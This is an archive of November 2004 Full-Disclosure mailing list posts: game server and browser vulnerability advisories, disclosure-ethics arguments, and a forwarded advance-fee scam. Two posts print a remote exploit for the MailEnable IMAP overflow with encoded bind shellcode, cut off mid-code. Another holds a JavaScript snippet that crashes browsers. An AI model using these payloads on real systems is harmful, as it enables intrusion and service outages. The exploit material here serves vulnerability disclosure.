### Luigi Auriemma Application: Star Wars Battlefront http://www.lucasarts.com/games/swbattlefront/ Versions: = 1.11 Platforms:Windows Xbox and Playstation 2 have not been tested Bugs: A] limited buffer-overflow in nickname B] crash caused by arbitrary memory access Exploitation: remote, versus server (in-game) Date: 24 November 2004 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:http://aluigi.altervista.org ### 1) Introduction 2) Bugs 3) The Code 4) Fix ### === 1) Introduction === Star Wars Battlefront is the newest game based on the universe of Star Wars, is developed by Pandemic Studios (http://www.pandemicstudios.com) and has been released at September 2004. This game is available also for Xbox and Playstation 2. The dedicated server for Playstation 2 runs on Windows and uses the same join protocol of the PC version, in fact I have tested it and is vulnerable. Since I'm not able to directly test also these 2 platforms I cannot confirm if they are vulnerables or not. ### === 2) Bugs === -- A] limited buffer-overflow in nickname -- If a client uses a too big nickname causes a limited buffer-overflow in the server. Limited because doesn't seem possible to overwrite important memory zones and, so, to execute remote code. -- B] crash caused by arbitrary memory access -- Exists a strange field in the join request used by this game. This field is a 32 bits value that must contain a memory offset used to build the following debug message: player %s had crash at 0x%x\n where %s is just the memory address specified by the client. The effect, naturally, is that an attacker can force the server to read an unreacheable memory location causing its immediate crash. I have no idea about why has been used a so stupid and dangerous method. Note: this bug doesn't seem to affect the Playstation 2 dedicatd server. Both these bugs must be considered in-game bugs (traduced: if the server is protected with a password, the attacker must know it), simply because the password field (a 32 bits checksum) is controlled before the other informations so the packet is rejected if the password provided by the attacker is wrong. ### === 3) The Code === http://aluigi.altervista.org/fakep/swbfp.zip A] swbfp -s 100 localhost sends a nickname of 100 chars to the server B] swbfp -m 1234 localhost forces the server to read the data at offset 1234 (0x04d2) ### == 4) Fix == No fix. My first mail is dated 26 Oct 2004, the developers said to work on the fixing of the bugs but after all this time and after the release of 2 normal patches (so, not for these bugs) the situation is unknown... useless to ask the status of the patch to Pandemic, my latest two keep-alive mails have been completely ignored. ### --- Luigi Auriemma http://aluigi.altervista.org ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [HAT-SQUAD] Remote buffer overflow in MailEnable IMAP service
Hat-Squad Advisory: Remote buffer overflow in
MailEnable IMAP service
Product: MailEnable Mail ServerVendor Url:
http://www.mailenable.comVersion:
MailEnable Professional Edition v1.52, MailEnable Enterprise Edition
v1.01Vulnerability: Remote buffer overflow in IMAP serviceRelease Date:
26 November, 2004
Vendor Status:InInformed on 24 November
2004Response: 24 November 2004Fixed on 25 November 2004
Overview:
MailEnable's Mail Server software provides a
enterprise messaging platform for Microsoft Windows NT/2000/XP/2003
systems.MailEnable Proferssional IMAP services allows users to have server
hosted folders and subfolders.Two vulnerabilities were discovered by
Hat-Squad Team in MailEnable's IMAP service including a stack based buffer
overflowand an object pointer overwrite, both can lead to remote execution
of arbitrary code.
Problem:
1. Stack based Buffer Overflow:
Due to a boundary check bug in the IMAP service,
sending a client command with more than8198 bytes will cause a stack buffer
overflow.This vulnerability can be triggered before any kind of
authentification.
Sample Request:
as a result EIP will be overwritten with
ret_addr.
Proof Of Concept Exploit by class101 ([EMAIL PROTECTED]) :
/*
MailEnable , IMAP Service, Remote Buffer Overflow
Exploit v0.3
Homepage : www.mailenable.comAffected versions:
Pro
v1.52 Enterprise v1.01
Bug discovery : Nima Majidi at www.hat-squad.comExploit
code : class101 at www.hat-squad.com
dfind.kd-team.com
Fix
: http://mailenable.com/hotfix/MEIMAPS-HF041125.zip
Compilation :
101_ncat.cpp . Win32
(MSVC,cygwin)
101_ncat.c ... Linux
*/
#include stdio.h#include
string.h#include time.h#ifdef WIN32#include
"winsock2.h"#pragma comment(lib, "ws2_32")#else#include
sys/socket.h#include netinet/in.h#include
netinet/in_systm.h#include netinet/ip.h#include
netdb.h#include arpa/inet.h#include
unistd.h#include stdlib.h#include
fcntl.h#endif
file://BIND shellcode
port 101, XORed 0x88, thanx HDMoore.
char scode[]
="\xEB""\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF""\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D""\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9""\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C""\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89""\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03""\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F""\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88""\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61""\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9""\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C""\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8""\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68""\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F""\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23""\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89""\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9""\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77""\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77""\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77""\x58\x68\x61\x63\x6B\x90";
static char payload[1];
char magikcll[]="\x7a\x8c\x01\x10"; file://CALL EDI - MEAISP.dll - "Universal"char
gay[]="\x4b\x2d\x4f\x54\x69\x4b"; file://long F0CK to
them
void usage(char* us);
#ifdef WIN32WSADATA
wsadata;#endif
void ver();
int main(int argc,char
*argv[]){ver();if
((argc3)||(argc4)||(atoi(argv[1])1)||(atoi(argv[1])1)){usage(argv[0]);return
-1;}#ifndef WIN32#define Sleepsleep#define
SOCKETint#define closesocket(s) close(s)#elseif
(WSAStartup(MAKEWORD(2,0),wsadata)!=0){printf("[+] wsastartup
error\n");return -1;}#endifint ip=htonl(inet_addr(argv[2])), sz,
port, sizeA, a;char *target, *os;if
(argc==4){port=atoi(argv[3]);}else port=143;if
(atoi(argv[1]) == 1){target=magikcll;os="Win2k SP4 Pro
English\n[+] Win2k SP4
Pro
French\n[+] Win2k SP4 Server
English\n[+] all Win2k, NT4
(supposed)";}SOCKET s;fd_set mask;struct timeval timeout;struct
sockaddr_in server;if
(s=socket(AF_INET,SOCK_STREAM,0)==-1){printf("[+] socket() error\n");return
-1;}printf("[+] target:
%s\n",os);server.sin_family=AF_INET;server.sin_addr.s_addr=htonl(ip);server.sin_port=htons(port);connect(s,(
struct sockaddr
*)server,sizeof(server));timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(mask);FD_SET(s,mask);switch(select(s+1,NULL,mask,NULL,timeout)){case
-1:
Re: [Full-Disclosure] University Researchers Challenge Bush Win In Florida
Todd Towles wrote: Did the charter say something about political messages?..please take it off the list guys if possible... Actually, I thought that particular post was in the spirit of the list... It seemed to me to address technologies and methodologies. I didn't think that it dwelled on party political issues. Though, to be honest, I think Paul should have sent that last one just to the addressee not to the list. But he does come up with some gems so he won't go on my plonkers list :) If you want to be truly pedantic as to what counts as political, well... there wouldn't be much to choose from. Everything is politics if you squint hard enough. I find the best method of dealing with full disclosure is that every time you see someone post something you consider off topic or a troll or whatever suits your taste, simply filter their address out. Filtering by subject doesn't help much as trolls will post to *anything* but trolls *will* post. So as long as I filter out anyone that seems like a troll (or otherwise an idiot) full disclosure comes up with some gems. And the best part is that if someone on your plonker list says something genuinely interesting, they will doubtless be quoted by someone else so you may still get to read it. And the list has an archive. Without filters I'd have left FD years ago... -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Schmehl Sent: Wednesday, November 24, 2004 11:22 AM To: Jason Coombs; Gregory Gilliss; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] University Researchers Challenge Bush Win In Florida --On Wednesday, November 24, 2004 05:39:31 AM + Jason Coombs [EMAIL PROTECTED] wrote: [massive snip] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Fwd: Hi, It's Me !!!!!
Could you please not forward your spam to the list. This is a 411 scam...if you don't know what that is..then please contact this person and talk to him. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of john morris Sent: Thursday, November 25, 2004 7:00 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Fwd: Hi, It's Me ! -- Forwarded message -- From: [EMAIL PROTECTED] [EMAIL PROTECTED] Date: Wed, 24 Nov 2004 21:08:16 -0800 Subject: Hi, It's Me ! To: FROM THE DESK OF BARRISTER. Wisdom Joshua (ESQ). Dear, I am Wisdom Joshua Esq., a Senior Advocate of Nigeria . I am the legal Representative to Mr. Harold Lebron, a national of your country, who used to work with Shell Development Company in Nigeria. Here in after shall be referred to as my client. On the 21st of April 2001, my client, his wife and their only daughter were involved in a fire outbreak in there residence. All of the family members unfortunately lost there lives. Since then I have made several enquiries to your embassy here to locate any of my clients extended relatives, this has also proved unsuccessful. After these several unsuccessful attempts, I decided to track his closest relations over the Internet, hence I contacted you. I have contacted you to assist in returning the fund valued at 16,000,000.00 USD left behind by my client before it gets confiscated or declared unserviceable by the Vault Company or Managers where this huge amount were Lodged. The said Finance Company has issued me a notice to provide the relatives or families of the deceased or have the account confiscated within the next fourteen official working days. For the fact that I have been unsuccessful in locating the relatives for over 2 years now, I seek the consent to present you as the family member to the deceased, so that the proceeds of this account can be paid to you. Secondly he has a consignment tagged 'family valuables' he shipped or lifted by as cargo to Europe early the same year he died, according to the information he passed to me, it is of a important to him. Therefore, if you are interested, endeavor to reach me immediately on my other email as thus: [EMAIL PROTECTED] to enable me inform you the modalities on how to carry out this project. I have all necessary information and legal documents needed to back you up for claim. All I require from you is your honest cooperation to enable us see this transaction through. I guarantee that this will be executed under legitimate arrangement that will protect you from any breach of the law. Please get in touch with me as soon as possible to enable us conclude in this matter. Best regards, Barrister Wisdom Joshua Esq. Metti il faccione di Shrek sul tuo cellulare! http://www.specialeshrek.canale5.com -- (FROM LINKS TO LINKS WE ARE ALL LINKED) cheers. morris ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Sun Java Plugin arbitrary package access vulnerability
- Original Message - From: Alla Bezroutchko [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Thursday, November 25, 2004 4:33 AM Subject: [Full-Disclosure] Re: Sun Java Plugin arbitrary package access vulnerability As noted by rodmoses(at)yahoo(dot)com Opera remains vulnerable even after the upgrade of JVM to version 1.4.2_06. (tested on Windows XP SP2, Opera 7.54, J2SE 1.4.2_06). This wasn't mentioned in the original disclosure announcement, but is it safe to assume that jre-1.5.0 would *not* be vulnerable? Or has it not been tested? Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer University of Texas at Dallas http://www.utdallas.edu/ AVIEN Founding Member ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: To anybody who's offended by my disclosure policy
Berend-Jan Wever wrote: I will try to explain this all once again, but only ONCE again: If you repeat it often enough, maybe I'll get it. MSIE IFRAME bufferoverflow: I did not disclose the vulnerability: I wrote an analysis of a publicly known vulnerability. It was a warning that there could be malicious people stealing your creditcard details and whatnot with a 0day exploit. Nobody seemed to notice... Maybe the advisory was to technical, maybe the vendor didn't want bad publicity, I don't know. I figured it was in everybody's interest to make the exploit public knowledge so everybody would take notice and could take precautions. In that I succeeded. What did I get for all this ? Fame and attention. So you want fame and attention. I am glad you admit it and I appreciate you for it. Most will cover it with BS. But who has to die for your fame and attention? MSIE nested array sort() loop Stack overflow exception: People are expecting me to play by their rules but they do not offer me anything in return. You just said you want fame and attention - so what do you care if you get paid? Plus.. nobody is MAKING you do ANYTHING. I've had enough of that, so I decided to release this without enough details. Instead of relying on me for information, you now have to rely on your vendor. Let's see how long it takes them to come up with an analysis. Firefox and Opera just got cought in the crossfire. Ahh, so although I sympathize and understanbd how vendors can really suck and not give credit and/or inform of fixing a vulnerability - it is part of the business. Instead of accepting that or releasing information appropriately (according to any standards), you decided to get upset, kick some dust and say: NOW YOU'LL PAY!. My disclosure policy: Most vendors treat hackers like free beta-testers that they can put the blame on when publicity goes bad. Mozilla does pay for remotely exploitable vulnerabilities. Fact of the matter is I could have released more IE 0day exploits if I wanted to, but I've choosen to disclose them responsibly. That choice was made a lot easier by iDefense, who do pay people for their time and knowledge. I have also found other vulnerabilities in Firefox, but I also choose not to disclose them untill I've analysed them and reported them to the vendor. So, basically - if you don't get paid (IE case), you don't bother to disclose responsibly? Why bother researching the vulnerability and waste your time in the first place? So what do I get for all my time and work ? - Do I get payed ? No. I wonder why. The security industry may be about both very smart and very stupid people, but it is also about integrity. You blatantly state you don't have any. - Do I get n00bs trying to flame me ? Yes. It is not about flaming, it is about attention. You wanted attention - you got it. Nobody promised what kind of attention you'd get. Do things differently, and you'll get a different kind of attention. - Do I get attention from people who do know what I am talking about and might want to hire me to work for them ? Yes. Good luck. No sarcasm intended. PS. Recursive function call will cause stack overflow causing write exception in guard page on a push, no control over registers: no exploit. P.S.S. RIGHT. Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] More Browser on Macosx flaws: nested array sort() loop Stack overflow exception
Same problems on MACOSX 10.3.6 with:
-Safari 1.2.4
-Mozilla 1.7
-Camino 0.7.0
-Firefox 1.0
-Opera 6.0.3
Not affected IE 5.2.3
Regards
--
Marco Mella
-
Hi all,
Same flaw works for Firefox as well as MSIE:
HTML
SCRIPT a = new Array(); while (1) { (a = new
Array(a)).sort(); } /SCRIPT
SCRIPT a = new Array(); while (1) { (a = new
Array(a)).sort(); } /SCRIPT
/HTML
Added to the list:
http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html
I'd have loved to CC mozilla about this, but I
didn't have the time to do the crash course how to
write a bug report and go through all that bugzilla
crap.
Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever
___
Nuovo Yahoo! Messenger: E' molto più divertente: Audibles, Avatar, Webcam,
Giochi, RubricaÂ… Scaricalo ora!
http://it.messenger.yahoo.it
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: FIREFOX flaws: nested array sort() loop Stack overflow exception
I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap. No need, someone went through all that bugzilla crap for you: https://bugzilla.mozilla.org/show_bug.cgi?id=271716 https://bugzilla.mozilla.org/show_bug.cgi?id=271718 JT -- -+ James Tait, BSc |XMPP: [EMAIL PROTECTED] Programmer and Open Source advocate | Mobile: +44 (0)7779 337596 -+ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: FIREFOX flaws: nested array sort() loop Stack overflow exception
I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap. So instead you unleash it upon kiddie and spammer world? That's lovely. Next you will come by again and say: I'm still hoping I get to see the guy who wrote those MyDoom worms in court, he violated the GPL and spread millions(?) of copies of my (modified) source). So, you release it like you did and, expect what? Some people are advocates of this or that disclosure mechanism, and believe they are right. I can bite. You just say: I'm so cool. I will release this, get a ton of attention and then say 'hey! They violated GPL! How dare they?!' Full disclosure. Responsible disclosure (according to whoever). Non-disclosure. Fine. What are you doing? Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MSIE flaws: nested array sort() loop Stack overflow exception
On Thu, Nov 25, 2004 at 12:17:42PM +0200, Adi Pircalabu wrote: Also Opera 7.54 should be added, it crashes on the above code, at least the native FreeBSD version It looks like Konqueror (3.3.1) is safe. After a few seconds, the script stops and a popup tells the user that a script is blocking KHTML and that if it keeps running, other apps can be impacted. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [HAT-SQUAD][Sploit-FIXed-sorry] Remote buffer overflow in MailEnable IMAP service
Hat-Squad Advisory: Remote buffer overflow in
MailEnable IMAP service
Product: MailEnable Mail ServerVendor Url:
http://www.mailenable.comVersion:
MailEnable Professional Edition v1.52, MailEnable Enterprise Edition
v1.01Vulnerability: Remote buffer overflow in IMAP serviceRelease Date:
26 November, 2004
Vendor Status:InInformed on 24 November
2004Response: 24 November 2004Fixed on 25 November 2004
Overview:
MailEnable's Mail Server software provides a
enterprise messaging platform for Microsoft Windows NT/2000/XP/2003
systems.MailEnable Proferssional IMAP services allows users to have server
hosted folders and subfolders.Two vulnerabilities were discovered by
Hat-Squad Team in MailEnable's IMAP service including a stack based buffer
overflowand an object pointer overwrite, both can lead to remote execution
of arbitrary code.
Problem:
1. Stack based Buffer Overflow:
Due to a boundary check bug in the IMAP service,
sending a client command with more than8198 bytes will cause a stack buffer
overflow.This vulnerability can be triggered before any kind of
authentification.
Sample Request:
as a result EIP will be overwritten with
ret_addr.
Proof Of Concept Exploit by class101 ([EMAIL PROTECTED]) :
/*
MailEnable , IMAP Service, Remote Buffer Overflow
Exploit v0.4
Homepage : www.mailenable.comAffected versions:
Pro
v1.52 Enterprise v1.01
Bug discovery : Nima Majidi at www.hat-squad.comExploit
code : class101 at www.hat-squad.com
dfind.kd-team.com
Fix
: http://mailenable.com/hotfix/MEIMAPS-HF041125.zip
Compilation :
101_ncat.cpp . Win32
(MSVC,cygwin)
101_ncat.c ... Linux
*/
#include stdio.h#include
string.h#include time.h#ifdef WIN32#include
"winsock2.h"#pragma comment(lib, "ws2_32")#else#include
sys/socket.h#include netinet/in.h#include
netinet/in_systm.h#include netinet/ip.h#include
netdb.h#include arpa/inet.h#include
unistd.h#include stdlib.h#include
fcntl.h#endif
file://BIND shellcode
port 101, XORed 0x88, thanx HDMoore.
char scode[]
="\xEB""\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF""\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D""\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9""\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C""\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89""\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03""\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F""\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88""\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61""\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9""\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C""\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8""\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68""\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F""\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23""\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89""\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9""\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77""\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77""\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77""\x58\x68\x61\x63\x6B\x90";
static char payload[1];
char magikcll[]="\x7a\x8c\x01\x10"; file://CALL EDI - MEAISP.dll - "Universal"char
gay[]="\x4b\x2d\x4f\x54\x69\x4b"; file://long F0CK to
them
void usage(char* us);
#ifdef WIN32WSADATA
wsadata;#endif
void ver();
int main(int argc,char
*argv[]){ver();if
((argc3)||(argc4)||(atoi(argv[1])1)||(atoi(argv[1])1)){usage(argv[0]);return
-1;}#ifndef WIN32#define Sleepsleep#define
SOCKETint#define closesocket(s) close(s)#elseif
(WSAStartup(MAKEWORD(2,0),wsadata)!=0){printf("[+] wsastartup
error\n");return -1;}#endifint ip=htonl(inet_addr(argv[2])), sz,
port, sizeA, a;char *target, *os;if
(argc==4){port=atoi(argv[3]);}else port=143;if
(atoi(argv[1]) == 1){target=magikcll;os="Win2k SP4 Pro
English\n[+] Win2k SP4
Pro
French\n[+] Win2k SP4 Server
English\n[+] all Win2k, NT4
(supposed)";}SOCKET s;fd_set mask;struct timeval timeout;struct
sockaddr_in server;s=socket(AF_INET,SOCK_STREAM,0);if
(s==-1) {printf("[+] socket() error\n");return -1;}printf("[+] target:
%s\n",os);server.sin_family=AF_INET;server.sin_addr.s_addr=htonl(ip);server.sin_port=htons(port);connect(s,(
struct sockaddr
*)server,sizeof(server));timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(mask);FD_SET(s,mask);switch(select(s+1,NULL,mask,NULL,timeout)){case
-1:
[Full-Disclosure] Rumours about Opera
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi y'all, to clear some rumours about Opera 7.54: The opera guys use their own binding from javascript to java, which does not conform to the java plug-in. Moreover they expliclity allowed access to the sun.* packages in the default security configuration, so there is no need for a magic exploit. I reported that misery to opera on the 1st of september, so they should be aware of their java problems. Remember that java 1.4.2_04 (and less) driven applets also allow covert channels between applets from different sites. This is exploitable by a second order attack where a shared public variable in the XSLT processor can be used by a passive attacker. He is able to inject a piece of sleeping java code in the JVM which gets executed when the XSLT processor is invoked. There is an Sun advisory out there that came out in august, that warns about the issue. Java 1.4.2_05 also has a vulnerability in the serialization APIs (used by RMI) that allows to overload a remote JVM [and drive uptime loads to the 100s]. I reported that to Sun on the 11th of April. It is fixed in 1.4.2_06, too. P.S.: Have phun with java, but maybe you should consider python for productivity. [http://www.ferg.org/projects/python_java_side-by-side.html , great stuff steven!] marc schoenefeld http://www.illegalaccess.org On Thu, 25 Nov 2004, Alla Bezroutchko wrote: Date: Thu, 25 Nov 2004 11:33:03 +0100 From: Alla Bezroutchko [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: Re: Sun Java Plugin arbitrary package access vulnerability Jouko Pynnonen wrote: A vulnerability in Java Plugin allows an attacker to create an Applet which can disable Java's security restrictions and break out of the Java sandbox. skip The Java Plugin versions 1.4.2_04 and 1.4.2_05 were tested on Windows and Linux. Web browsers tested were Microsoft Internet Explorer, Mozilla Firefox and Opera. It should be noted that Opera uses a different way of connecting JavaScript and Java which caused the test exploit not to work on Opera. However the problem itself (access to private packages) was demonstrated on Opera too, so it may be vulnerable to a variation of the exploit. As noted by rodmoses(at)yahoo(dot)com Opera remains vulnerable even after the upgrade of JVM to version 1.4.2_06. (tested on Windows XP SP2, Opera 7.54, J2SE 1.4.2_06). According to Jouko, Opera does not use Java plugin, but has its own interface to Java. The fact that the problem is still present after JVM upgrade probably means that there is an independent bug in Opera Java interface which has the same effect as the bug in Sun Java Plugin. AFAIK there is no fix for Opera yet. I have reported this bug to Opera through their web interface (bug-158156). There is an online test for this bug at Browser Security Test (http://bcheck.scanit.be/bcheck/). Go to http://bcheck.scanit.be/bcheck/choosetests.php if you only want to run the test for this particular bug. Alla. - -- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.6 (AIX) iD8DBQFBpk0dqCaQvrKNUNQRAoWgAJ49D1DuDCRwAFp4VKIbdVHz0qdhuACfQA5+ S/edMzVv1vZsyPSXkhk7GDw= =NXu5 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
So instead you unleash it upon kiddie and spammer world? That's lovely. Next you will come by again and say: I'm still hoping I get to see the guy who wrote those MyDoom worms in court, he violated the GPL and spread millions(?) of copies of my (modified) source). So, you release it like you did and, expect what? Some people are advocates of this or that disclosure mechanism, and believe they are right. I can bite. You just say: I'm so cool. I will release this, get a ton of attention and then say 'hey! They violated GPL! How dare they?!' Full disclosure. Responsible disclosure (according to whoever). Non-disclosure. Fine. What are you doing? I agree, not to mention that that bugzilla crap is not really crap. I find it to be a solid system for the most part. Also, It has been proven that involving the general public to help out in filing bugs has been useful in resolving problems that would otherwise go unnoticed until script kiddies start abusing them. Plus bugzilla is not really that hard to use, takes just a few minutes really. -- http://www.loconet.ca ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] FIREFOX flaws: nested array sort()
So, where do you all stand. Exploit for fame or for purpose?
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
Berend-Jan Wever
Sent: 25 November 2004 01:05
To: [EMAIL PROTECTED];
[EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Full-Disclosure] FIREFOX flaws: nested array sort()
loop Stack overflow exception
Hi all,
Same flaw works for Firefox as well as MSIE:
HTML
SCRIPT a = new Array(); while (1) { (a = new
Array(a)).sort(); } /SCRIPT
SCRIPT a = new Array(); while (1) { (a = new
Array(a)).sort(); } /SCRIPT /HTML
Added to the list:
http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html
I'd have loved to CC mozilla about this, but I didn't have
the time to do the crash course how to write a bug report
and go through all that bugzilla crap.
Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever
Randall M
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
Nice ...fresh from the oven too. This, if it works, should be a 'extremely critical' update from Ms. Wouldn't such a tool be of limited utility, given that the unpriviliged application's windows are on the same desktop as, and can therefore send messages to, windows belonging to priviliged applications? I'm sorry but seeing other people insist that is OK to send American election stuff to the list, I thought it would be OK to translate your text into something that made sense so here goes: Un tal attrezzo non sarebbe di programma di utilità limitato, dato che unpriviliged le finestre dell'applicazione sono sullo stesso tavolo come e possono quindi trasmettere i messaggi a, le finestre che appartengono a priviliged le applicazioni? Naaa...sorry, I dont speak Italian so it didnt make sense to me that way, either. If you're trying to make a point, you're not doing very well. (If you truly don't understand what I said, you might try a google search for the strings win32 and shatter. Neither of which is directly related to either American elections procedures or the Italian language.) -- Phil ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
